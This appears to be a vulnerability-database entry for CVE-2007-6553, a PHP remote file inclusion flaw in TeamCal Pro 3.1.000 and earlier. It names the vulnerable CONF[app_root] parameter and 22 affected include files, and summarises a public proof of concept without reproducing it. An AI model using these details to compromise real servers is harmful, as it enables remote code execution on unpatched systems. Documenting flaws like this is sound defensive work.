CVE-2007-6553
TeamCal Pro < 3.1.000 - Remote Code Execution via CONF[app_root] Parameter
Title source: llmExploitation Summary
EIP tracks 1 public exploit for CVE-2007-6553. PoCs published by GoLd_M.
AI-analyzed exploit summary The exploit demonstrates multiple Remote File Inclusion (RFI) and Local File Inclusion (LFI) vulnerabilities in TeamCal Pro <= 3.1.000. It provides specific URLs with crafted parameters to exploit these vulnerabilities, allowing an attacker to include arbitrary remote or local files.
Description
Multiple PHP remote file inclusion vulnerabilities in TeamCal Pro 3.1.000 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the CONF[app_root] parameter to (1) tcuser.class.php, (2) absencecount.inc.php, (3) avatar.inc.php, (4) csvhandler.class.php, (5) functions.tcpro.php, (6) header.html.inc.php, (7) joomlajack.tcpro.php, (8) menu.inc.php, (9) other.inc.php, (10) tcabsence.class.php, (11) tcabsencegroup.class.php, (12) tcallowance.class.php, (13) tcannouncement.class.php, (14) tcconfig.class.php, (15) tcdaynote.class.php, (16) tcgroup.class.php, (17) tcholiday.class.php, (18) tclogin.class.php, (19) tcmonth.class.php, (20) tctemplate.class.php, (21) tcusergroup.class.php, or (22) tcuseroption.class.php in includes/, possibly a related issue to CVE-2006-4845.
Exploits (1)
The exploit demonstrates multiple Remote File Inclusion (RFI) and Local File Inclusion (LFI) vulnerabilities in TeamCal Pro <= 3.1.000. It provides specific URLs with crafted parameters to exploit these vulnerabilities, allowing an attacker to include arbitrary remote or local files.